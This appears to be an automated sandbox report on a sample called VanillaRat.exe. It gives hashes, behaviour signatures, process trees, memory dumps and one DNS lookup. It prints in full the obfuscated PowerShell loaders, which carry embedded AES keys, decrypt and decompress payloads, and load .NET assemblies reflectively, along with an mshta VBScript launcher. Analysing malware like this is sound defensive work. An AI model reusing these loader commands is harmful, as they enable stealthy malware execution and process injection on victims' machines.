| SHA512 | daa5bbe52eb182c0c773cdada347084ef90065d672edf87ce730c6c52f1f414e02b3a4d24537fbe3f0c5b78a9f8b25f841135704af0dd1aaa4feb939d9d27a84 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d36101a0-8bbc-4f58-9376-e66b1e9d058e.tmp.txt
| MD5 | 19dd5bf5f040cd8938d4906de40fc6b4 |
| SHA1 | 6897482ae7731de937b323da5fb470722fa7df98 |
| SHA256 | ef42103f97d449551d0b0b2b0ec157e6dea6a9f42117699cbf43fa6f3f99e7e6 |
| SHA512 | f1b23f9cbdcb89ea12ecef4f40990a6c48ba7f0a330fa784f56c02db9fe5e89310ccad5f3cde2ea332fbd4359e3beb910b64c79bd5b7d452002be3cf6019a070 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.343706d5-b3a5-4b5a-9558-4aee2662dc89.tmp.csv
| MD5 | a1943b66516a4160e4a1dfd76bb862fe |
| SHA1 | ded42d5dbf064403aa95e7dbca31927e6e2abcf9 |
| SHA256 | fac149a4a9ca62ac11ad9d680cec535f259a18ccf725607cd9057fc96b372053 |
| SHA512 | 32433e1bfb993dcc22588044edee28270df62b9462caf5abf5963175c656fab4eea211bbe154fdc8e14eecceaad59ab2459d82caeb3445136dd5d0ef72c2d7e9 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.26a1de1a-702b-4c53-ba3b-e4209748b7bc.tmp.txt
| MD5 | efdb005de50dcccd0e5a0d9c9cb69eb3 |
| SHA1 | b31b96ff9d4a5fbbb98ff972fff5222c1b96c7e0 |
| SHA256 | 873f276fed49ddb032081564121b5a002c415890b53ddacd183f8bf56bb5ee16 |
| SHA512 | 813320b292689e172832f3a4cf60597c8501d0abc5d01d3080d4c5cb398dfcb4d2979fee66675f3a8767433646dc8e396483fc07a083add21ff1e58a7da5a21a |
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win7-20240704-en
Max time kernel
22s
Max time network
19s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe
"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
Network
Files
memory/2432-0-0x000007FEF56C3000-0x000007FEF56C4000-memory.dmp
memory/2432-1-0x0000000000A20000-0x0000000000BDE000-memory.dmp
memory/2432-2-0x000007FEF56C0000-0x000007FEF60AC000-memory.dmp
memory/2432-3-0x000000001BEF0000-0x000000001BFD0000-memory.dmp
memory/2432-4-0x000007FEF56C0000-0x000007FEF60AC000-memory.dmp
memory/2840-9-0x000007FEECC8E000-0x000007FEECC8F000-memory.dmp
memory/2840-10-0x000000001B350000-0x000000001B632000-memory.dmp
memory/2840-11-0x0000000001F60000-0x0000000001F68000-memory.dmp
memory/2840-12-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp
memory/2840-13-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp
memory/2840-14-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp
memory/2840-15-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp
memory/2432-16-0x000007FEF56C3000-0x000007FEF56C4000-memory.dmp
memory/2432-17-0x000007FEF56C0000-0x000007FEF60AC000-memory.dmp
memory/2840-18-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp
memory/2840-19-0x000007FEECC8E000-0x000007FEECC8F000-memory.dmp
\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
memory/2840-25-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win10-20240404-en
Max time kernel
60s
Max time network
21s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4588 created 564 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\system32\winlogon.exe |
| PID 4588 created 564 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\system32\winlogon.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\International\Geo\Nation | C:\Windows\$sxr-mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4588 set thread context of 656 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 4588 set thread context of 1632 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 4588 set thread context of 1600 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 4588 set thread context of 3872 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance | C:\Windows\$sxr-mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe
"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{05f2ac45-92e4-4f14-8881-ace328a0574e}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{d36bbe4c-8175-4128-847f-69464971dbfa}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e501f1c1-975e-43a2-8573-35497546766a}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{28beff50-36c5-4596-8c14-43feb29a3939}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 26.211.222.173.in-addr.arpa | udp |
Files
memory/1468-0-0x00007FFA60383000-0x00007FFA60384000-memory.dmp
memory/1468-1-0x0000019E40000000-0x0000019E401BE000-memory.dmp
memory/1468-2-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/1468-3-0x0000019E5B6D0000-0x0000019E5B7B0000-memory.dmp
memory/1468-4-0x0000019E5BA60000-0x0000019E5BC04000-memory.dmp
memory/1468-5-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/1468-10-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4640-11-0x0000025B7A940000-0x0000025B7A962000-memory.dmp
memory/4640-15-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4640-14-0x0000025B7AC30000-0x0000025B7ACA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izbbwn40.3f3.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4640-16-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4640-31-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | f7722b62b4014e0c50adfa9d60cafa1c |
| SHA1 | f31c17e0453f27be85730e316840f11522ddec3e |
| SHA256 | ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa |
| SHA512 | 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4 |
memory/1468-58-0x00007FFA60383000-0x00007FFA60384000-memory.dmp
memory/1468-63-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4640-64-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4588-65-0x0000029F18000000-0x0000029F18024000-memory.dmp
memory/4588-68-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp
memory/4588-69-0x00007FFA7CDA0000-0x00007FFA7CE4E000-memory.dmp
memory/4640-70-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4588-71-0x0000029F182F0000-0x0000029F18D40000-memory.dmp
memory/4588-73-0x0000029F18D40000-0x0000029F18DE6000-memory.dmp
memory/4588-88-0x0000029F18DF0000-0x0000029F18E46000-memory.dmp
memory/4588-89-0x0000029F18E50000-0x0000029F18EA8000-memory.dmp
